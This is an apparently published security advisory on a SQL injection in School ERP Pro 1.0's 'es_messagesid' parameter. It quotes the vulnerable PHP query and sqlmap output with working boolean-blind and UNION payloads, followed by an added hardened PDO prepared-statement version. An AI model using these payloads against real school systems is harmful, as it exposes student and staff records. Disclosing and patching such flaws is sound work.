School ERP Pro 1.0 SQL Injection

2020.05.01
Credit: Besim Altinok
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

SQL Injection Detail
--------------------------------

# Vulnerable parameter: es_messagesid

# Vulnerable code:

if($action=="fullmessage_sent"){
    $msg_qry ="SELECT * FROM es_messages WHERE from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and es_messagesid=".$es_messagesid;
    $details_message=$db->getrow($msg_qry);
}
?>

Here is the SQLmap output:
----------------------------------------

GET parameter 'es_messagesid' is vulnerable.
sqlmap identified the following injection point(s):
---
Parameter: es_messagesid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT 6369=6369

    Type: UNION query
    Title: Generic UNION query (random number) - 12 columns
    Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL SELECT 6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- -
---
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL
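As an added illustration that is not code from the advisory or from School ERP Pro, the concatenation pattern above is shown next to a hardened version: the identifier is validated as a bare integer and then bound through a PDO prepared statement, so the request value can never change the query structure. The `$pdo` connection, its DSN and credentials, and the `mysqli` handle in the vulnerable variant are assumptions; the table, columns and session layout come from the advisory.

```php
<?php
// Added example (not the project's code). $db / $pdo are assumed database
// handles; es_messages and its columns are taken from the advisory.

// VULNERABLE: the request value is pasted into the SQL text, so a value such
// as "17 OR NOT 6369=6369" or a UNION clause becomes part of the statement.
function fetch_message_vulnerable(mysqli $db, int $user_id, string $es_messagesid): ?array {
    $sql = "SELECT * FROM es_messages WHERE from_id=" . $user_id
         . " AND from_type='student' AND es_messagesid=" . $es_messagesid;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED: reject anything that is not a decimal number, then bind the value
// as a parameter. The statement text is fixed before any user data reaches MySQL.
function fetch_message_safe(PDO $pdo, int $user_id, string $es_messagesid): ?array {
    if (!ctype_digit($es_messagesid)) {
        return null; // "17 OR NOT ..." and "17 UNION ..." never reach the query
    }
    $stmt = $pdo->prepare(
        'SELECT * FROM es_messages'
        . ' WHERE from_id = :uid AND from_type = :ftype AND es_messagesid = :mid'
    );
    $stmt->bindValue(':uid', $user_id, PDO::PARAM_INT);
    $stmt->bindValue(':ftype', 'student', PDO::PARAM_STR);
    $stmt->bindValue(':mid', (int) $es_messagesid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Handler shaped like the advisory's branch; DSN and credentials are placeholders.
if (($_GET['action'] ?? '') === 'fullmessage_sent') {
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=DB_NAME_PLACEHOLDER', 'DB_USER', 'DB_PASS', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);
    $details_message = fetch_message_safe(
        $pdo,
        (int) $_SESSION['eschools']['user_id'],
        (string) ($_GET['es_messagesid'] ?? '')
    );
}
```

With `ATTR_EMULATE_PREPARES` disabled the parameter is sent separately from the statement, so the boolean-based and UNION probes listed in the sqlmap output above are treated as a literal (and rejected by `ctype_digit` before that).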


Copyright 2020, cxsecurity.com